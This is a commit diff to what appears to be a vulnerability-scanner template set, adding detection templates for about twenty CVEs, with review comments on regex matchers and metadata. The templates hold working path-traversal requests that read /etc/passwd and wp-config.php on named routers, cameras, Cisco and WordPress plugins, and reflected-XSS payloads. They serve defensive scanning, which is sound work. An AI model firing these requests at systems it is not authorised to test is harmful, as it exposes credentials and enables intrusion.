Adding new templates (8.4.2)

main
daffainfo 2021-07-27 07:25:17 +07:00
parent 22df30d514
commit 313ccd41aa
29 changed files with 559 additions and 9 deletions

@ -17,7 +17,7 @@ requests:
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- "root:.*:0:0"
- type: status
status:
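
Review bot: `root:.*:0:0` in the regex matcher is greedy and unanchored, so any response line that contains `root:` and, somewhere later, `:0:0` satisfies it, not only a passwd entry for root. The password field of a passwd line cannot contain a colon, so `root:[^:]*:0:0:` accepts more field values than `root:[x*]:0:0` while still bounding the field. The same applies to every template in this commit that uses the `.*` form.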

26
CVE-2010-2307.yaml Executable file

@ -0,0 +1,26 @@
id: CVE-2010-2307
info:
name: Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
reference: |
- https://www.securityfocus.com/bid/40550/info
- https://nvd.nist.gov/vuln/detail/CVE-2010-2307
tags: cve,cve2010,iot,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
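
Review bot: `path` sends only `{{BaseURL}}/../../etc/passwd`, while the description lists three vectors (multiple leading slashes, `../` sequences and encoded dot-dot sequences). Add the `//` and encoded variants as further `path` entries so a device that filters one form is still detected, and confirm the `../` segments reach the server without being normalized by the client.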

26
CVE-2010-4231.yaml Executable file

@ -0,0 +1,26 @@
id: CVE-2010-4231
info:
name: Camtron CMNC-200 IP Camera - Directory Traversal
author: daffainfo
severity: high
description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system.
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2010-4231
- https://www.exploit-db.com/exploits/15505
tags: cve,cve2010,iot,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
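
Review bot: typo in `description`: "directory transversal attacks" should read "directory traversal attacks", matching the template `name`.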

@ -20,7 +20,7 @@ requests:
- type: regex
regex:
- "root:[x*]:0:0"
- "root:.*:0:0"
- type: status
status:

25
CVE-2011-3315.yaml Executable file

@ -0,0 +1,25 @@
id: CVE-2011-3315
info:
name: Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049.
reference: https://www.exploit-db.com/exploits/36256
tags: cve,cve2011,lfi,cisco
requests:
- method: GET
path:
- "{{BaseURL}}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
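
Review bot: style points in `info`: the `name` is missing a space before the separator ("Unified IP-IVR- Directory Traversal") and `reference` is a bare string here while the other templates in this commit use a `reference: |` block with one URL per line. Use one form throughout so the metadata parses uniformly.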

32
CVE-2012-4889.yaml Executable file

@ -0,0 +1,32 @@
id: CVE-2012-4889
info:
name: ManageEngine Firewall Analyzer 7.2 - Reflected Cross Site Scripting (XSS)
author: daffainfo
severity: medium
description: Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.
reference: |
- https://www.securityfocus.com/bid/52841/info
- https://nvd.nist.gov/vuln/detail/CVE-2012-4889
tags: cve,cve2012,xss,manageengine
requests:
- method: GET
path:
- "{{BaseURL}}/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
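
Review bot: the body matcher checks only `</script><script>alert(document.domain)</script>`, but the request sends `%22%3E` in front of it, so the match does not show that the `">` breakout was reflected unencoded. Include the `">` prefix in the matched word. The description also names seven injectable parameters across four endpoints, while the template exercises only `port` on `syslogViewer.do`; either add the others as extra `path` entries or narrow the description.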

25
CVE-2013-5528.yaml Executable file

@ -0,0 +1,25 @@
id: CVE-2013-5528
info:
name: Cisco Unified Communications Manager 7/8/9 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815
reference: https://www.exploit-db.com/exploits/40887
tags: cve,cve2013,lfi,cisco
requests:
- method: GET
path:
- "{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
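
Review bot: the description says the flaw is reachable by "remote authenticated users", but the request under `requests:` is a single unauthenticated GET with no login step, cookie or credentials. As written the template can only match where `/ccmadmin/` serves the file without a session; add an authenticated flow or state in `description` that credentials are not supplied.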

31
CVE-2013-7240.yaml Executable file

@ -0,0 +1,31 @@
id: CVE-2013-7240
info:
name: WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.
reference: |
- https://www.exploit-db.com/exploits/38936
- https://nvd.nist.gov/vuln/detail/CVE-2013-7240
tags: cve,cve2013,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
- "DB_HOST"
- "The base configurations of the WordPress"
part: body
condition: and
- type: status
status:
- 200
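
Review bot: the word matcher uses `condition: and` and one of its words is the comment string "The base configurations of the WordPress", which differs from the "The base configuration for WordPress" string matched by the CVE-2018-20985 template in this same commit. A wp-config.php whose header comment is worded the other way will fail the whole matcher; drop the comment string and rely on `DB_NAME`, `DB_PASSWORD` and `DB_HOST`.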

25
CVE-2014-2962.yaml Executable file

@ -0,0 +1,25 @@
id: CVE-2014-2962
info:
name: Belkin N150 Router 1.00.08/1.00.09 - Directory Traversal
author: daffainfo
severity: high
description: Path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.
reference: https://www.exploit-db.com/exploits/38488
tags: cve,cve2014,lfi,router
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
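
Review bot: `name` and `description` disagree on the affected firmware: the name says "1.00.08/1.00.09" while the description says "firmware before 1.00.08". Align the two against the cited reference so triage does not have to guess which versions a hit implies.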

24
CVE-2014-6308.yaml Executable file

@ -0,0 +1,24 @@
id: CVE-2014-6308
info:
name: Osclass Security Advisory 3.4.1 - Local File Inclusion
author: daffainfo
severity: high
reference: https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html
tags: cve,cve2014,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
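
Review bot: the `info` block has no `description`, unlike most of the templates in this commit, and the `name` reads "Osclass Security Advisory 3.4.1" rather than naming the product and version. The `path` also hard-codes an `/osclass/` prefix, so installs at the web root are not checked; add a second `path` entry without the prefix.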

@ -18,7 +18,7 @@ requests:
matchers:
- type: regex
regex:
- "root:[0*]:0:0"
- "root:.*:0:0"
part: body
- type: status
status:
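
Review bot: `[0*]` in `root:[0*]:0:0` is a character class that accepts only `0` or `*` as the password field, so it never matched the usual `x` placeholder. Moving away from it is right, but `root:[^:]*:0:0:` does that without the unbounded `.*` of `root:.*:0:0`.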

@ -18,7 +18,7 @@ requests:
matchers:
- type: regex
regex:
- "root:[0*]:0:0"
- "root:.*:0:0"
part: body
- type: status
status:

29
CVE-2016-1000126.yaml Executable file

@ -0,0 +1,29 @@
id: CVE-2016-1000126
info:
name: Admin Font Editor <= 1.8 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000126
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
CVE-2016-1000127.yaml Executable file

@ -0,0 +1,30 @@
id: CVE-2016-1000127
info:
name: AJAX Random Post <= 2.00 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin ajax-random-post v2.00
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000127
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
CVE-2016-1000137.yaml Executable file

@ -0,0 +1,29 @@
id: CVE-2016-1000137
info:
name: Hero Maps Pro 2.1.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=658
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

29
CVE-2016-1000138.yaml Executable file

@ -0,0 +1,29 @@
id: CVE-2016-1000138
info:
name: Admin Font Editor <= 1.8 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=38
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
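
Review bot: the `name` is "Admin Font Editor <= 1.8", identical to CVE-2016-1000126, but the `path` targets `/wp-content/plugins/indexisto/assets/js/indexisto-inject.php`. This looks like a copy-paste leftover; rename the template after the Indexisto plugin and add a `description` so results are attributed to the right component.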

29
CVE-2016-1000140.yaml Executable file

@ -0,0 +1,29 @@
id: CVE-2016-1000140
info:
name: New Year Firework <= 1.1.9 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000140
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
CVE-2016-1000152.yaml Executable file

@ -0,0 +1,30 @@
id: CVE-2016-1000152
info:
name: Tidio-form <= 1.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin tidio-form v1.0
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000152
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
CVE-2016-1000154.yaml Executable file

@ -0,0 +1,30 @@
id: CVE-2016-1000154
info:
name: WHIZZ <= 1.0.7 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin whizz v1.0.
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000154
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
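
Review bot: the version in `name` ("WHIZZ <= 1.0.7") does not match the one in `description` ("whizz v1.0."). Settle on the version given by the cited NVD entry and use it in both fields.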

@ -18,7 +18,7 @@ requests:
matchers:
- type: regex
regex:
- "root:[0*]:0:0"
- "root:.*:0:0"
part: body
- type: status
status:

27
CVE-2018-10822.yaml Executable file

@ -0,0 +1,27 @@
id: CVE-2018-10822
info:
name: D-Link Routers - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request.
reference: |
- https://www.exploit-db.com/exploits/45678
- https://nvd.nist.gov/vuln/detail/CVE-2018-10822
tags: cve,cve2018,lfi,router,dlink
requests:
- method: GET
path:
- "{{BaseURL}}/uir//etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

@ -21,7 +21,7 @@ requests:
matchers:
- type: regex
regex:
- "root:[0*]:0:0"
- "root:.*:0:0"
- "\\[(font|extension|file)s\\]"
condition: or
part: body
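
Review bot: with `condition: or` on this regex list, either pattern alone decides the match, so the unbounded `root:.*:0:0` becomes sufficient by itself next to `\\[(font|extension|file)s\\]`. Bound the password field (`root:[^:]*:0:0:`) so a loose hit on one alternative does not produce a finding.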

@ -19,7 +19,7 @@ requests:
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- "root:.*:0:0"
part: body
- type: status

31
CVE-2018-20985.yaml Executable file

@ -0,0 +1,31 @@
id: CVE-2018-20985
info:
name: WordPress Plugin WP Payeezy Pay 2.97 - Local File Inclusion
author: daffainfo
description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected.
reference: |
- https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/
- https://www.cvedetails.com/cve/CVE-2018-20985/
severity: high
tags: cve,cve2018,wordpress,lfi
requests:
- method: POST
path:
- "{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php"
body: "x_login=../../../wp-config"
matchers-condition: and
matchers:
- type: word
words:
- "The base configuration for WordPress"
- "define( 'DB_NAME',"
- "define( 'DB_PASSWORD',"
condition: and
part: body
- type: status
status:
- 200
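
Review bot: the POST sends `x_login=../../../wp-config` as a form body, but the request sets no `Content-Type` header; add a `headers` block with `Content-Type: application/x-www-form-urlencoded` so the server parses the field. The word matchers also depend on exact spacing (`define( 'DB_NAME',`), which misses a wp-config.php written as `define('DB_NAME',`; matching `DB_NAME` and `DB_PASSWORD` alone is more robust.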

@ -2,7 +2,7 @@ id: CVE-2019-15713
info:
name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
author: daffainfo,dhiyaneshDk
severity: medium
description: Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site.
reference: |

@ -20,7 +20,7 @@ requests:
- type: regex
regex:
- "root:[x*]:0:0"
- "root:.*:0:0"
- type: status
status:

25
CVE-2020-29227.yaml Executable file

@ -0,0 +1,25 @@
id: CVE-2020-29227
info:
name: Car Rental Management System 1.0 - Local File Inclusion (LFI)
author: daffainfo
severity: high
description: An issue was discovered in Car Rental Management System 1.0. An unauthenticated user can perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, to cause local file inclusion resulting in code execution.
reference: |
- https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5
- https://nvd.nist.gov/vuln/detail/CVE-2020-29227
tags: cve,cve2020,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?page=/etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
part: body
- type: status
status:
- 200
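
Review bot: the regex here is `root:.*:0:0:` with a trailing colon, while every other template in this commit uses `root:.*:0:0`; pick one form for the whole set, preferably the bounded `root:[^:]*:0:0:`. The description also claims "code execution" while the request only demonstrates reading `/etc/passwd`, so say in `description` that the check confirms file read only.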

20
CVE-2020-35580.yaml Executable file

@ -0,0 +1,20 @@
id: CVE-2020-35580
info:
name: SearchBlox < 9.2.2 - Local File Inclusion (LFI)
author: daffainfo
severity: high
description: Local File Inclusion vulnerability in the FileServlet in all SearchBlox before 9.2.2 allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin API key and the base64 encoded SHA1 password hashes of other SearchBlox users.
reference: https://hateshape.github.io/general/2021/05/11/CVE-2020-35580.html
tags: cve,cve2020,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/searchblox/servlet/FileServlet?col=9&url=/etc/passwd"
matchers:
- type: regex
regex:
- "root:.*:0:0"
part: body
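
Review bot: this template has no `matchers-condition: and` and no `status` matcher, so the single regex `root:.*:0:0` on the body decides the result, unlike the other traversal templates in this commit that also require `200`. Add the status check and bound the regex, or an error page that echoes the `url` parameter alongside unrelated text can match.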

27
CVE-2021-23241.yaml Executable file

@ -0,0 +1,27 @@
id: CVE-2021-23241
info:
name: Mercury Router Web Server Directory Traversal
author: daffainfo
severity: medium
description: MERCUSYS Mercury X18G 1.0.5 devices allow Directory Traversal via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI.
reference: |
- https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-23241
tags: cve,cve2021,iot,lfi,router
requests:
- method: GET
path:
- "{{BaseURL}}/loginLess/../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
part: body
- type: status
status:
- 200